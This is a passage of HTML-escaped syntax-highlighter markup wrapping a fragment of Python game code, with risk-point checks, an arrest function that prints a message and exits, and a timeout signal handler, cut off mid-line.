!important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;coworker_risk&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-69&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-70&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;risk_point&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;arrest_min_point&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-71&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;sys&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;stderr&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;you(&quot;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;player_info&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;+&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;) looks like dangerous !!!&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-72&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;Arrest&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-73&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-74&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;def&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;Arrest&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;self&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-75&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;sys&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;stderr&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;you Arrest Again....&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-76&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;exit&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-77&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-78&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-r&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;def&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;handler&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;signum&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;frame&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-79&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;sys&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;stderr&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Time Out....&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-80&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;exit&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-81&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c67721bbf3b5004813667-82&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;signal&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;signal&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;signal&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) 